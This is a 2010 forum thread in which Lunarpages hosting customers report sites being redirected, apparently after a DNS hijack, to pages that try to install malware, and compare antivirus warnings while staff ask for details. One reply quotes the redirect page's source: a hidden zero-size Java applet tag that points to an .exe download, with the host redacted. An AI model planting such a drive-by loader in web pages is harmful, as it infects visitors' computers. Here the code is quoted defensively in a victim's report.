Lunarpages Web Hosting Forum

Author Topic: Issues with Las Vegas nameservers - lunarservers  (Read 33035 times)

Re: Issues with Las Vegas nameservers - lunarservers
« Reply #15 on: June 05, 2010, 10:52:56 AM »


I am using Firefox and so far, I and others who have attempted to load my site are only getting redirected. No virus files or malware attempting to load in IE, Firefox, Linux, chrome nor Safari.

Debbie

Actually, when the page comes up with the advertisement, in 5 secs it tries to redirect you to the actually website with the malicious cookie file and java add-on... With my 2 pcs, on Windows Xp, it successfully redirects and Norton sees it and AVG, with Windows 7 it crashes IE, but redirected 1 time and AVG caught it.

NOTE: Just wanted to add that this is what I found when using my own 2 PCs at home, when at a client site, with Windows 7 it just advertise the page, never redirected.
« Last Edit: June 05, 2010, 10:55:19 AM by United By Faith Ministries, Inc. »

Offline Debbie

  • Spaceship Navigator
  • *****
  • Posts: 99
    • Internet Tech Specialists
Re: Issues with Las Vegas nameservers - lunarservers
« Reply #16 on: June 05, 2010, 10:58:52 AM »
Wow! I'm not getting that! Thanks for the explanation and the warning!

Debbie
"Sooner or later, you are going to learn, just as I did, that there is  a difference between KNOWING the path and WALKING the path."  ~Morpheus, from The Matrix~

Offline wektech

  • Master Jedi
  • *****
  • Posts: 1038
    • Yuma Arizona Information
Re: Issues with Las Vegas nameservers - lunarservers
« Reply #17 on: June 05, 2010, 11:02:14 AM »
While I can protect myself from the redirects, my readers may not! This looks like our sites have been hacked and we our all loosing credibility with our users. There seems to be issues at opensrs.net as well.

Offline Jippy

  • Space Explorer
  • ***
  • Posts: 8
Re: Issues with Las Vegas nameservers - lunarservers
« Reply #18 on: June 05, 2010, 11:03:35 AM »
Yeah, my only issue is at the very bottom of the pagesource for the redirect page, it has this:

Code: [Select]
<aPplet ARCHive="/static/SiteException.jar" cODE="SiteError.class" wiDTH="0" heiGhT="0"> <pArAm NamE="url" Value="HTtp://REMOVED/REMOVED.exe"> </aPpLET>  </CenTeR> </BODy> </html>  
Sitename and filename removed.  

I just don't know if that's trying to download and run an exe on the machine or not.  

DanielM

  • Guest
Re: Issues with Las Vegas nameservers - lunarservers
« Reply #19 on: June 05, 2010, 11:04:50 AM »
Jippy - Thanks for that. I have notified our admins.

Re: Issues with Las Vegas nameservers - lunarservers
« Reply #20 on: June 05, 2010, 11:09:13 AM »
Just to update my findings with a few friends.. going to my website only i tested it with AVg and Norton 360.....



Windows 7 Ultimate  ( My PC )- loads adverstisement page, redirects it, ask for a cookie to be downlaoded.. nothing happens, website for foreign company shows no virus alerts

Windows 7 Professional ( Miami ) - loads advertisement page, tries to redirect, Norton stops page with warning, another PC with AVG stops page with warning saying site is a malicious harmful site

Windows 7 Home Premium ( Charlotte, NC )- loads advertisment, never tries to redirect, ask for cookie to the website, AVG and norton blocks the page

Windows XP Pro w/ sp3 ( Myy Pc and Charlotte, NC )  - absolutely nothing

vlad.panainte

  • Guest
Re: Issues with Las Vegas nameservers - lunarservers
« Reply #21 on: June 05, 2010, 11:21:20 AM »
Hello,

Can you please provide more information like as page example where you've noticed this redirect for us being able to troubleshoot further this issue.

Thank you very much!

Offline wektech

  • Master Jedi
  • *****
  • Posts: 1038
    • Yuma Arizona Information
Re: Issues with Las Vegas nameservers - lunarservers
« Reply #22 on: June 05, 2010, 11:25:34 AM »
yumazone.com on fyodor is being redirected as is walterscampriverproperties.com on hani
« Last Edit: June 05, 2010, 11:28:41 AM by wektech »

Re: Issues with Las Vegas nameservers - lunarservers
« Reply #23 on: June 05, 2010, 11:54:26 AM »
ubfministries.org, net, com

Offline thisislobo

  • Trekkie
  • **
  • Posts: 15
Re: Issues with Las Vegas nameservers - lunarservers
« Reply #24 on: June 05, 2010, 11:58:03 AM »
Can you please provide more information like as page example where you've noticed this redirect for us being able to troubleshoot further this issue.

tundlajunction.com being redirected to <link removed>

Mod Edit: Removed link
« Last Edit: June 05, 2010, 12:02:08 PM by DanielM »

Offline parallaxtz

  • Newbie
  • *
  • Posts: 3
Re: Issues with Las Vegas nameservers - lunarservers
« Reply #25 on: June 05, 2010, 12:01:03 PM »
markribau.org is being redirect to some other web hosting service in sweden

DanielM

  • Guest
Re: Issues with Las Vegas nameservers - lunarservers
« Reply #26 on: June 05, 2010, 12:01:25 PM »
Again, please do not post the URL that these sites are redirecting to.

Thanks.

Offline Debbie

  • Spaceship Navigator
  • *****
  • Posts: 99
    • Internet Tech Specialists
Re: Issues with Las Vegas nameservers - lunarservers
« Reply #27 on: June 05, 2010, 12:56:08 PM »
This is beginning to sound like your DNS server was hijacked. Wow!
"Sooner or later, you are going to learn, just as I did, that there is  a difference between KNOWING the path and WALKING the path."  ~Morpheus, from The Matrix~

Offline wektech

  • Master Jedi
  • *****
  • Posts: 1038
    • Yuma Arizona Information
Re: Issues with Las Vegas nameservers - lunarservers
« Reply #28 on: June 05, 2010, 12:57:15 PM »
Is there a status update? Should I pull the lunar name servers off at opensrs so that my users are not put at risk?

Offline solar

  • Intergalactic Superstar
  • *****
  • Posts: 183
Safe to go into the water, yet?
« Reply #29 on: June 05, 2010, 02:25:58 PM »
I'm with wektech, will really appreciate an update on this.

Our site has been loading fine the last couple of hours, but we did experience about 90 minutes of the ******.se detour issue at around the time this topic was first posted. Surely reminds us how fragile the whole internet can be.

I know you must be way busy with all this extra fun, but could someone just post a quick update on status for us? I'd like to make sure our visitors are not going to be confronted with this issue now. I see opensrs has redirected their domain name for now (is that right, wektech?), but it would be a big deal if we needed to do that. Hope not.

Thank you.